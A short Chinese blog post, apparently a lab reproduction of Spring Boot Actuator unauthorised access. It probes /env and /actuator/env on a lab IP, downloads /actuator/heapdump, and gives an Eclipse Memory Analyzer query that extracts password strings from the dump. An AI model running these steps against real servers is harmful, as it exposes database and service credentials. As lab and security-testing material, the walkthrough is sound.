漏洞复现:

0.搭建SpringBoot环境

git clone https://github.com/veracode-research/actuator-testbed
mvn install 或者 mvn spring-boot:run

1.访问如下路径如果有数据说明存在漏洞

# Spring Boot 1.x版本访问/env
http://192.168.127.155:8090/env

# Spring Boot 2.x版本访问/actuator/env
http://192.168.127.155:8090/actuator/env

1.png

2.当发现存在未授权漏洞时,可以直接访问 /actuator/heapdump 下载内存,提取密码

http://192.168.127.155:8090/actuator/heapdump

3.heapdump文件下载完成之后可以利用Eclipse Memory Analyzer 来解析内存文件

# 匹配内存中password字符串,并不一定能匹配完很迷,可以通过/actuator/env得到的JDBC信息再来匹配关键字
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))

2.png

Eclipse Memory Analyzer下载地址
https://www.eclipse.org/mat/downloads.php

标签: SpringBoot

添加新评论